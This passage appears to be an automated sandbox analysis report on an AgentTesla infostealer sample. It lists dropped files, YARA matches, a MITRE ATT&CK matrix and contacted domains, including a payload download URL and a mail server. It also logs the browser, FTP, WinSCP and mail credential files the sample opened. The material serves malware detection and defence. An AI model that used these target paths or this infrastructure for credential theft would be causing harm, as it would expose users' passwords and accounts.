Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2715317704.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2715317704.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2715317704.000000000304E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1871888281.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1790656213.00000000031CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1871888281.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1871888281.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1790656213.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1790656213.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DOCUMENTS.vbs.exe PID: 7804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7752, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1790656213.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DOCUMENTS.vbs.exe PID: 7804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7752, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2715317704.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2715317704.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2715317704.000000000304E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1871888281.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1790656213.00000000031CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1871888281.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1871888281.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1790656213.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1790656213.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DOCUMENTS.vbs.exe PID: 7804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7752, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	21 Scripting	Valid Accounts	331 Windows Management Instrumentation	21 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	212 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	531 Security Software Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DOCUMENTS.vbs	7%	Virustotal		Browse
DOCUMENTS.vbs	21%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	0%	Virustotal	Browse
C:\Users\user\Desktop\DOCUMENTS.vbs.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
ip-api.com	0%	Virustotal	Browse
etehadshipping.com	4%	Virustotal	Browse
mail.topcats.com	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://r10.o.lencr.org0#	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://ip-api.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe
https://etehadshipping.com/AW/DH/Dvkuvug.dat	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-netJ	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
http://mail.topcats.com	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-net	0%	Avira URL Cloud	safe
http://crl.microsnq	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://ip-api.com/line/?fields=hosting2	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://github.com/mgravell/protobuf-neti	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-net	0%	Virustotal		Browse
http://mail.topcats.com	2%	Virustotal		Browse
https://etehadshipping.com	0%	Avira URL Cloud	safe
http://ip-api.com/line/?fields=hostingxLl	0%	Avira URL Cloud	safe
http://r10.i.lencr.org/0	0%	Avira URL Cloud	safe
http://www.microsoft.co	1%	Virustotal		Browse
https://github.com/mgravell/protobuf-netJ	0%	Virustotal		Browse
https://github.com/mgravell/protobuf-neti	0%	Virustotal		Browse
https://etehadshipping.com	4%	Virustotal		Browse
http://r10.i.lencr.org/0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
etehadshipping.com	5.144.130.41	true	false	4%, Virustotal, Browse	unknown
mail.topcats.com	173.254.28.210	true	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://etehadshipping.com/AW/DH/Dvkuvug.dat	false	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://stackoverflow.com/q/14436606/23354	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004D0B000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004A59000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000067CB000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
